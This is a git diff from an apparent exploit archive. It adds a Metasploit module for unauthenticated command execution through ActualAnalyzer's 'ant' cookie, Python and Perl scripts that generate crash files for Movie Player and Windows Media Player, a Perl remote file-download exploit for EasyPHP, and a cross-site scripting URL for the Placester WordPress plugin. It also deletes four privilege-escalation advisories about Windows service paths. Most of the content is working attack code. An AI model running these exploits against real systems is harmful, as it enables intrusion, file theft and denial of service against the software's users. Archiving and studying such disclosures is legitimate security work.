\ No newline at end of file
diff --git a/platforms/php/webapps/35562.txt b/platforms/php/webapps/35562.txt
new file mode 100755
index 000000000..314abc036
--- /dev/null
+++ b/platforms/php/webapps/35562.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/47142/info
+
+The Placester WordPress Plugin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+Placester 0.1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/wordpress/wp-content/plugins/placester/admin/support_ajax.php?ajax_action=%22%3E%3Cscript%3Ealert%280%29%3C/script%3E
\ No newline at end of file
diff --git a/platforms/unix/remote/35549.rb b/platforms/unix/remote/35549.rb
new file mode 100755
index 000000000..fe467ef21
--- /dev/null
+++ b/platforms/unix/remote/35549.rb
@@ -0,0 +1,264 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => "ActualAnalyzer 'ant' Cookie Command Execution",
+      'Description'     => %q{
+        This module exploits a command execution vulnerability in
+        ActualAnalyzer version 2.81 and prior.
+
+        The 'aa.php' file allows unauthenticated users to
+        execute arbitrary commands in the 'ant' cookie.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Benjamin Harris', # Discovery and exploit
+          'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
+        ],
+      'References'      =>
+        [
+          ['EDB', '34450'],
+          ['OSVDB', '110601']
+        ],
+      'Payload'         =>
+        {
+          'Space'       => 4096, # HTTP cookie
+          'DisableNops' => true,
+          'BadChars'    => "\x00"
+        },
+      'Arch'            => ARCH_CMD,
+      'Platform'        => 'unix',
+      'Targets'         =>
+        [
+          # Tested on ActualAnalyzer versions 2.81 and 2.75 on Ubuntu
+          ['ActualAnalyzer <= 2.81', { 'auto' => true }]
+        ],
+      'Privileged'      => false,
+      'DisclosureDate'  => 'Aug 28 2014',
+      'DefaultTarget'   => 0))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to ActualAnalyzer', '/lite/']),
+        OptString.new('USERNAME', [false, 'The username for ActualAnalyzer', 'admin']),
+        OptString.new('PASSWORD', [false, 'The password for ActualAnalyzer', 'admin']),
+        OptString.new('ANALYZER_HOST', [false, 'A hostname or IP monitored by ActualAnalyzer', ''])
+      ], self.class)
+  end
+
+  #
+  # Checks if target is running ActualAnalyzer <= 2.81
+  #
+  def check
+    # check for aa.php
+    res = send_request_raw('uri' => normalize_uri(target_uri.path, 'aa.php'))
+    if !res
+      vprint_error("#{peer} - Connection failed")
+      return Exploit::CheckCode::Unknown
+    elsif res.code == 404
+      vprint_error("#{peer} - Could not find aa.php")
+      return Exploit::CheckCode::Safe
+    elsif res.code == 200 && res.body =~ /ActualAnalyzer Lite/ && res.body =~ /Admin area<\/title>/
+      vprint_error("#{peer} - ActualAnalyzer is not installed. Try installing first.")
+      return Exploit::CheckCode::Detected
+    end
+    # check version
+    res = send_request_raw('uri' => normalize_uri(target_uri.path, 'view.php'))
+    if !res
+      vprint_error("#{peer} - Connection failed")
+      return Exploit::CheckCode::Unknown
+    elsif res.code == 200 && /title="ActualAnalyzer Lite \(free\) (?<version>[\d\.]+)"/ =~ res.body
+      vprint_status("#{peer} - Found version: #{version}")
+      if Gem::Version.new(version) <= Gem::Version.new('2.81')
+        report_vuln(
+          host: rhost,
+          name: self.name,
+          info: "Module #{fullname} detected ActualAnalyzer #{version}",
+          refs: references,
+        )
+        return Exploit::CheckCode::Vulnerable
+      end
+      return Exploit::CheckCode::Detected
+    elsif res.code == 200 && res.body =~ /ActualAnalyzer Lite/
+      return Exploit::CheckCode::Detected
+    end
+    Exploit::CheckCode::Safe
+  end
+
+  #
+  # Try to retrieve a valid analytics host from view.php unauthenticated
+  #
+  def get_analytics_host_view
+    analytics_host = nil
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'view.php'),
+      'vars_post' => {
+        'id_h' => '',
+        'listp' => '',
+        'act_h' => 'vis_int',
+        'oldact' => 'vis_grpg',
+        'tint_h' => '',
+        'extact_h' => '',
+        'home_pos' => '',
+        'act' => 'vis_grpg',
+        'tint' => 'total',
+        'grpg' => '201',
+        'cp_vst' => 'on',
+        'cp_hst' => 'on',
+        'cp_htst' => 'on',
+        'cp_reps' => 'y',
+        'tab_sort' => '1_1'
+      }
+    )
+    if !res
+      vprint_error("#{peer} - Connection failed")
+    elsif /<option value="?[\d]+"?[^>]*>Page: https?:\/\/(?<analytics_host>[^\/^<]+)/ =~ res.body
+      vprint_good("#{peer} - Found analytics host: #{analytics_host}")
+      return analytics_host
+    else
+      vprint_status("#{peer} - Could not find any hosts on view.php")
+    end
+    nil
+  end
+
+  #
+  # Try to retrieve a valid analytics host from code.php unauthenticated
+  #
+  def get_analytics_host_code
+    analytics_host = nil
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'code.php'),
+      'vars_get' => {
+        'pid' => '1'
+      }
+    )
+    if !res
+      vprint_error("#{peer} - Connection failed")
+    elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body
+      vprint_good("#{peer} - Found analytics host: #{analytics_host}")
+      return analytics_host
+    else
+      vprint_status("#{peer} - Could not find any hosts on code.php")
+    end
+    nil
+  end
+
+  #
+  # Try to retrieve a valid analytics host from admin.php with creds
+  #
+  def get_analytics_host_admin
+    analytics_host = nil
+    user = datastore['USERNAME']
+    pass = datastore['PASSWORD']
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin.php'),
+      'vars_post' => {
+        'uname' => user,
+        'passw' => pass,
+        'id_h' => '',
+        'listp' => '',
+        'act_h' => '',
+        'oldact' => 'pages',
+        'tint_h' => '',
+        'extact_h' => '',
+        'param_h' => '',
+        'param2_h' => '',
+        'home_pos' => '',
+        'act' => 'dynhtml',
+        'set.x' => '11',
+        'set.y' => '11'
+      }
+    )
+    if !res
+      vprint_error("#{peer} - Connection failed")
+    elsif res.code == 200 && res.body =~ />Login</
+      vprint_status("#{peer} - Login failed.")
+    elsif res.code == 200 && /alt='ActualAnalyzer' src='https?:\/\/(?<analytics_host>[^\/^']+)/ =~ res.body
+      vprint_good("#{peer} - Found analytics host: #{analytics_host}")
+      print_good("#{peer} - Login successful! (#{user}:#{pass})")
+      service_data = {
+        address: Rex::Socket.getaddress(rhost, true),
+        port: rport,
+        service_name: (ssl ? 'https' : 'http'),
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+      }
+      credential_data = {
+        origin_type: :service,
+        module_fullname: fullname,
+        private_type: :password,
+        private_data: pass,
+        username: user
+      }
+      credential_data.merge!(service_data)
+      credential_core = create_credential(credential_data)
+      login_data = {
+        core: credential_core,
+        last_attempted_at: DateTime.now,
+        status: Metasploit::Model::Login::Status::SUCCESSFUL
+      }
+      login_data.merge!(service_data)
+      create_credential_login(login_data)
+      return analytics_host
+    else
+      vprint_status("#{peer} - Could not find any hosts on admin.php")
+    end
+    nil
+  end
+
+  def execute_command(cmd, opts = { analytics_host: vhost })
+    vuln_cookies = %w(anw anm)
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path, 'aa.php'),
+      'vars_get' => { 'anp' => opts[:analytics_host] },
+      'cookie' => "ant=#{cmd}; #{vuln_cookies.sample}=#{rand(100...999)}.`$cot`"
+    )
+    if !res
+      fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out")
+    elsif res.code == 302 && res.headers['Content-Type'] =~ /image/
+      print_good("#{peer} - Payload sent successfully")
+      return true
+    elsif res.code == 302 && res.headers['Location'] =~ /error\.gif/
+      vprint_status("#{peer} - Host '#{opts[:analytics_host]}' is not monitored by ActualAnalyzer.")
+    elsif res.code == 200 && res.body =~ /Admin area<\/title>/
+      fail_with(Failure::Unknown, "#{peer} - ActualAnalyzer is not installed. Try installing first.")
+    else
+      fail_with(Failure::Unknown, "#{peer} - Something went wrong")
+    end
+    nil
+  end
+
+  def exploit
+    return unless check == Exploit::CheckCode::Vulnerable
+    analytics_hosts = []
+    if datastore['ANALYZER_HOST'].blank?
+      analytics_hosts << get_analytics_host_code
+      analytics_hosts << get_analytics_host_view
+      analytics_hosts << get_analytics_host_admin
+      analytics_hosts << vhost
+      analytics_hosts << '127.0.0.1'
+      analytics_hosts << 'localhost'
+    else
+      analytics_hosts << datastore['ANALYZER_HOST']
+    end
+    analytics_hosts.uniq.each do |host|
+      next if host.nil?
+      vprint_status("#{peer} - Trying hostname '#{host}' - Sending payload (#{payload.encoded.length} bytes)...")
+      break if execute_command(payload.encoded, analytics_host: host)
+    end
+  end
+end
\ No newline at end of file
diff --git a/platforms/windows/dos/35552.py b/platforms/windows/dos/35552.py
new file mode 100755
index 000000000..4aa01ee7a
--- /dev/null
+++ b/platforms/windows/dos/35552.py
@@ -0,0 +1,57 @@
+source: http://www.securityfocus.com/bid/47111/info
+
+MoviePlay is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
+
+Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
+
+MoviePlay 4.82 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/python
+#(+)Exploit Title: Movie Player v4.82 0Day Buffer overflow/DOS Exploit
+#(+)Software Link: http://www.movieplay.org/download.php
+#(+)Software  : Movie Player
+#(+)Version   : v4.82
+#(+)Tested On : WIN-XP SP3
+#(+) Date     : 31.03.2011
+#(+) Hour     : 3:37 PM
+#Similar Bug was found by cr4wl3r in MediaPlayer Classic
+
+print " _______________________________________________________________________";
+																	
+print "(+)Exploit Title: Movie Player v4.82 0Day Buffer overflow/DOS Exploit";
+ 
+print "(+) Software Link: http://www.movieplay.org/download.php";
+print "(+) Software  : Movie Player";
+print "(+) Version   : v4.82";
+print "(+) Tested On : WIN-XP SP3";
+print "(+) Date      : 31.03.2011";
+print "(+) Hour      : 13:37 PM	";
+print "____________________________________________________________________\n	";
+import time
+time.sleep (2);
+print "\nGenerating the exploit file !!!";
+time.sleep (2);
+print "\n\nMoviePlayerExploit.avi file generated!!";
+time.sleep (2);
+
+ExploitLocation = "C:\\MoviePlayerExploit.avi"
+f = open(ExploitLocation, "wb")
+memoryloc ='\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00';
+f.write(memoryloc)
+f.close()
+ 
+
+
+print "\n\n(+) Done!\n";
+print  "(+) Now Just open MoviePlayerExploit.avi with Movie Player and Kaboooommm !! ;) \n";
+print "(+) Most of the times there is a crash\n whenever you open the folder where the MoviePlayerExploit.avi is stored :D \n";
+
+time.sleep (2);
+time.sleep (1);
+print "\n\n\n########################################################################\n (+)Exploit Coded by: ^Xecuti0N3r & d3M0l!tioN3r \n";
+print "(+)^Xecuti0N3r: E-mail \n";
+print "(+)d3M0l!tioN3r: E-mail \n";
+print "(+)Special Thanks to: MaxCaps & aNnIh!LatioN3r \n";
+print "########################################################################\n\n";
+time.sleep (4);
+
diff --git a/platforms/windows/dos/35553.pl b/platforms/windows/dos/35553.pl
new file mode 100755
index 000000000..763a16d87
--- /dev/null
+++ b/platforms/windows/dos/35553.pl
@@ -0,0 +1,56 @@
+source: http://www.securityfocus.com/bid/47112/info
+
+Microsoft Windows Media Player is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
+
+Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
+
+Microsoft Windows Media Player 11.0.5721.5145 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/perl
+#(+)Exploit Title: Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit
+#(+)Software  : Windows Media player
+#(+)Version   : 11.0.5721.5145
+#(+)Tested On : WIN-XP SP3
+#(+) Date     : 31.03.2011
+#(+) Hour     : 13:37 
+#Similar Bug was found by cr4wl3r in MediaPlayer Classic
+
+system("color 6");
+system("title Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit");
+print "
+_______________________________________________________________________
+																	
+(+)Exploit Title:  Windows Media player 11.0.5721.5145 Buffer overflow/DOS Exploit
+ 
+		
+(+) Software  : Windows Media player
+(+) Version   : 11.0.5721.5145									
+(+) Tested On : WIN-XP SP3												
+(+) Date      : 31.03.2011												
+(+) Hour      : 13:37 PM													
+____________________________________________________________________\n	";
+sleep 2;
+system("cls");
+system("color 2");
+print "\nGenerating the exploit file !!!";
+sleep 2;
+print "\n\nWMPExploit.avi file generated!!";
+sleep 2;
+$theoverflow = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";
+ 
+open(file, "> WMPExploit.avi");
+print (file $theoverflow);
+print "\n\n(+) Done!\n
+(+) Now Just open WMPExplot.avi with Windows Media player and Kaboooommm !! ;) \n
+(+) Most of the times there is a crash\n whenever you open the folder where the WMPExploit.avi is stored :D \n";
+
+sleep 3;
+system("cls");
+sleep 1;
+system("color C");
+print "\n\n\n########################################################################\n
+(+)Exploit Coded by: ^Xecuti0N3r\n
+(+)^Xecuti0N3r: E-mail : xecuti0n3r@yahoo.com \n
+(+)Special Thanks to: MaxCaps, d3M0l!tioN3r & aNnIh!LatioN3r \n
+########################################################################\n\n";
+system("pause");
\ No newline at end of file
diff --git a/platforms/windows/local/35512.txt b/platforms/windows/local/35512.txt
deleted file mode 100755
index e57a4e973..000000000
--- a/platforms/windows/local/35512.txt
+++ /dev/null
@@ -1,47 +0,0 @@
-# Exploit Title:mobilis 3g mobiconnect 3G++ ZDServer 1.0.1.2  Service Trusted Path Privilege Escalation
-# Date: 07/12/2014
-#Author: Hadji Samir s-dz@hotmail.fr
-#Product web page: http://www.3G.dz/   http://www.mobilis.dz/
-#Affected version: 1.0.1.2
-#Tested on:  Windows 7  (FR)
-# Thanks Rachid Ben elkharchi
-
-
-   
- mobilis 3g mobiconnect 3G++ 
-'ZDServ.exe'
-service for Windows. This could potentially allow an authorized but
-non-privileged local user to execute arbitrary code with elevated
-privileges on the system. A successful attempt would require the
-local user to be able to insert their code in the system root path
-undetected by the OS or other security applications where it could
-potentially be executed during application startup or reboot. If
-successful, the local user’s code would execute with the elevated
-privileges of the application. 
-
-
-C:\Users\samir>sc qc ZDServ
-[SC] QueryServiceConfig réussite(s)
-
-SERVICE_NAME: ZDServ
-        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
-        START_TYPE         : 2   AUTO_START
-        ERROR_CONTROL      : 1   NORMAL
-        BINARY_PATH_NAME   : "C:\ProgramData\ZDSupport\ZDServ\ZDServ.exe"
-        LOAD_ORDER_GROUP   :
-        TAG                : 0
-        DISPLAY_NAME       : ZDServ
-        DEPENDENCIES       :
-        SERVICE_START_NAME : LocalSystem
-
-
-
-
-
-
-C:\Program Files\Hostless Modem\MOBICONNECT\ZDServSetup\ZDServ.exe Tout le monde:(I)(F)
-                                                                   AUTORITE NT\SystŠme:(I)(F)
-                                                                   BUILTIN\Administrateurs:(I)(F)
-                                                                   BUILTIN\Utilisateurs:(I)(RX)
-
-1 fichiers correctement trait‚sÿ; ‚chec du traitement de 0 fichiers
\ No newline at end of file
diff --git a/platforms/windows/local/35534.txt b/platforms/windows/local/35534.txt
deleted file mode 100755
index 8a244463d..000000000
--- a/platforms/windows/local/35534.txt
+++ /dev/null
@@ -1,38 +0,0 @@
-# Exploit Title: HTCSyncManager 3.1.33.0  (HSMServiceEntry.exe) Service Trusted Path Privilege Escalation
-# Date: 12/12/2014
-#Author: Hadji Samir s-dz@hotmail.fr
-#Product web page: http://www.htc.com/fr/software/htc-sync-manager/
-#Affected version: 3.1.33.0
-#Tested on:  Windows 7  (FR)
-
-    
- HTC Synchronisation manager for devices HTC
-
-Vulnerability Details
-There are weak permissions for 'HTCSyncManager'default installation where everyone is allowed to change 
-the HSMServiceEntry.exe with an executable of their choice. When the service restarts or the system reboots
-the attacker payload will execute on the system with SYSTEM privileges.
-
-
-C:\Users\samir>sc qc HTCMonitorService
-[SC] QueryServiceConfig réussite(s)
-
-SERVICE_NAME: HTCMonitorService
-        TYPE               : 10  WIN32_OWN_PROCESS
-        START_TYPE         : 2   AUTO_START
-        ERROR_CONTROL      : 1   NORMAL
-        BINARY_PATH_NAME   : "C:\Program Files\HTC\HTC Sync Manager\HSMServiceEntry.exe"
-        LOAD_ORDER_GROUP   :
-        TAG                : 0
-        DISPLAY_NAME       : HTCMonitorService
-        DEPENDENCIES       :
-        SERVICE_START_NAME : LocalSystem
-
-
-
-C:\Users\samir>icacls "C:\Program Files\HTC\HTC Sync Manager\HSMServiceEntry.exe"
-C:\Program Files\HTC\HTC Sync Manager\HSMServiceEntry.exe AUTORITE NT\Système:(I)(F)
-                                                                    BUILTIN\Administrateurs:(I)(F)
-                                                                    BUILTIN\Utilisateurs:(I)(RX)
-
-1 fichiers correctement traités ; échec du traitement de 0 fichiers
\ No newline at end of file
diff --git a/platforms/windows/local/35537.txt b/platforms/windows/local/35537.txt
deleted file mode 100755
index 8b9b154a6..000000000
--- a/platforms/windows/local/35537.txt
+++ /dev/null
@@ -1,37 +0,0 @@
-# Exploit Title: Avira 14.0.7.342 (avguard.exe)  Service Trusted Path Privilege Escalation
-# Date: 11/12/2014
-#Author: Hadji Samir s-dz@hotmail.fr
-#Product web page: http://www.avira.com/
-#Affected version: 14.0.7.342
-#Tested on:  Windows 7  (FR)
-
- 
- 
-    
- Avira free antivirus 14.0.7.342
-(avguard.exe)
-Avira free antivirus 14.0.7.342 contains a flaw in the 'avguard.exe' file that may reportedly allow gaining access to unauthorized privileges.
-The issue is due to an unquoted search path, which may allow a local attacker
-to inject arbitrary code in the root path.
-
-
-C:\Users\samir>sc qc AntiVirService
-[SC] QueryServiceConfig réussite(s)
-
-SERVICE_NAME: AntiVirService
-        TYPE               : 10  WIN32_OWN_PROCESS
-        START_TYPE         : 2   AUTO_START
-        ERROR_CONTROL      : 1   NORMAL
-        BINARY_PATH_NAME   : "C:\Program Files\Avira\AntiVir Desktop\avguard.exe"
-        LOAD_ORDER_GROUP   :
-        TAG                : 0
-        DISPLAY_NAME       : Avira Real-Time Protection
-        DEPENDENCIES       :
-        SERVICE_START_NAME : LocalSystem
-
-C:\Users\samir>icacls "C:\Program Files\Avira\AntiVir Desktop\avguard.exe"
-C:\Program Files\Avira\AntiVir Desktop\avguard.exe AUTORITE NT\Système:(I)(F)
-                                                   BUILTIN\Administrateurs:(I)(F)
-                                                   BUILTIN\Utilisateurs:(I)(RX)
-
-1 fichiers correctement traités ; échec du traitement de 0 fichiers
\ No newline at end of file
diff --git a/platforms/windows/local/35542.txt b/platforms/windows/local/35542.txt
deleted file mode 100755
index e42a4b421..000000000
--- a/platforms/windows/local/35542.txt
+++ /dev/null
@@ -1,41 +0,0 @@
-# Exploit Title:CodeMeter 4.50.906.503 Service Trusted Path Privilege Escalation
-# Date: 07/12/2014
-#Author: Hadji Samir s-dz@hotmail.fr
-#Product web page: http://www.wibu.com/fr/codemeter.html
-#Affected version: 4.50.906.503
-#Tested on:  Windows 7  (FR)
-
-'CodeMeter.exe '  
-CodeMeter represents the basic technology of all protection and licensing solutions from Wibu-Systems.
-
-CodeMeter contains a flaw in the 'CodeMeter.exe' 
-file that may reportedly allow gaining access to unauthorized privileges.
-The issue is due to an unquoted search path, which may allow a local attacker
-to inject arbitrary code in the root path.
- 
- 
-C:\Users\samir>sc qc CodeMeter.exe
-[SC] QueryServiceConfig réussite(s)
-
-SERVICE_NAME: CodeMeter.exe
-        TYPE               : 10  WIN32_OWN_PROCESS
-        START_TYPE         : 2   AUTO_START
-        ERROR_CONTROL      : 1   NORMAL
-        BINARY_PATH_NAME   : C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe
-        LOAD_ORDER_GROUP   :
-        TAG                : 0
-        DISPLAY_NAME       : CodeMeter Runtime Server
-        DEPENDENCIES       : Tcpip
-                           : Winmgmt
-        SERVICE_START_NAME : LocalSystem
- 
- 
- 
- 
- 
-C:\Users\samir>icacls "C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe"
-C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe AUTORITE NT\Système:(I)(F)
-                                                     BUILTIN\Administrateurs:(I)(F)
-                                                     BUILTIN\Utilisateurs:(I)(RX)
-
-1 fichiers correctement traités ; échec du traitement de 0 fichiers
\ No newline at end of file
diff --git a/platforms/windows/remote/35563.pl b/platforms/windows/remote/35563.pl
new file mode 100755
index 000000000..a47a5fd78
--- /dev/null
+++ b/platforms/windows/remote/35563.pl
@@ -0,0 +1,82 @@
+source: http://www.securityfocus.com/bid/47145/info
+
+EasyPHP is prone to a vulnerability that lets attackers to download arbitrary files because the application fails to sufficiently sanitize user-supplied input.
+
+An attacker can exploit this issue to download arbitrary files within the context of the webserver process. Information obtained may aid in further attacks.
+
+EasyPHP 5.3.5.0 is vulnerable; other versions may also be affected. 
+
+#!/usr/bin/perl
+# ********* In The name of Allah ************
+###
+# Title : EasyPHP Web Server 5.3.5.0 Remote File Download Exploit
+# Author : KedAns-Dz
+# E-mail : ked-h@hotmail.com
+# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
+# Twitter page : twitter.com/kedans
+# platform : Windows 
+# Impact : Remote Content/Download File
+# Tested on : Windows XP SP3 Fran?ais 
+# Target : EasyPHP 5.3.5.0
+###
+# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
+# ------------
+# EasyPHP Web Server is vulnerable for a Remote File Download attcak, the following code will exploit the bug.
+# The vulnerability allows an unprivileged attacker to download files whom he has no permissions to.
+# ------------
+# ********* In The name of Allah ************
+system("title KedAns-Dz");
+system("color 1e");
+system("cls");
+sleep(1);
+# Start Exploit : **  Allah Akbar ** 
+use LWP::Simple;
+if (@ARGV < 3) {
+print("\r\n");
+print("=================================================================\r\n");
+print("  [*] EasyPHP Web Server 5.3.5.0 Remote File Download Exploit\r\n");
+print("  [*] Discovered & Exploited by : KedAns-Dz\r\n");
+print("=================================================================\r\n");
+print("  [!] Usage: " .$0. " <host> <port> <file>\r\n");
+print("  [!] HOST - An host using EasyPHP Web Server\r\n");
+print("  [!] PORT - Port number\r\n");
+print("  [!] FILE - The file you want to get\r\n");
+print("  [!] Example: " .$0. " targetserver.com 80 index.php\r\n");
+print("=================================================================\r\n\r\n");
+sleep(1);
+exit(1);
+# **  Allah Akbar ** 
+} else {
+print("=================================================================\n");
+print("  [*] EasyPHP Web Server 5.3.5.0 Remote File Download Exploit\r\n");
+print("  [*] Discovered & Exploited by : KedAns-Dz\r\n");
+print("=================================================================\r\n\r\n");
+sleep(2);
+($host, $port, $file) = @ARGV;
+$content = get("http://" .$host. ":" .$port. "/" .$file. ".");
+print(" [+] File Content:\r\n\r\n");
+sleep(2);
+print($content. "\r\n");
+open (KDZ ,">","KedAns.log");
+print KDZ "Log File Exploited By KedAns-Dz <ked-h(at)hotmail(dot)com>\r\n" .
+          "Greets All Hackers Moslems & All My Friends \r\n" .
+          "Target : http://$host:$port/$file \r\n" .
+		  "File Content : \n\n" .
+		  "=============================\r\n\n" .
+		  "$content";
+print("\r\n");
+print("=================================================================\n");
+print "\n[+++] Creating And Download the Target File Content in KedAns.log \n";
+}
+# ** In The Peace of Allah **
+#================[ Exploited By KedAns-Dz * HST-Dz * ]===========================================  
+# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
+# Islampard * Zaki.Eng * Dr.Ride * Red1One * Badr0 * XoreR * Nor0 FouinY * Hani * Mr.Dak007 * Fox-Dz
+# Masimovic * TOnyXED * cr4wl3r (Inj3ct0r.com) * TeX (hotturks.org) * KelvinX (kelvinx.net) * Dos-Dz
+# Nayla Festa * all (sec4ever.com) Members * PLATEN (Pentesters.ir) * Gamoscu (www.1923turk.com)
+# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
+# Indoushka (Inj3ct0r.com) * [ Ma3sTr0-Dz * MadjiX * BrOx-Dz * JaGo-Dz (sec4ever.com) ] * Dr.0rYX 
+# Cr3w-DZ * His0k4 * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
+# www.packetstormsecurity.org * exploit-db.com * bugsearch.net * 1337day.com * exploit-id.com 
+# www.metasploit.com * www.securityreason.com * All Security and Exploits Webs ...
+#================================================================================================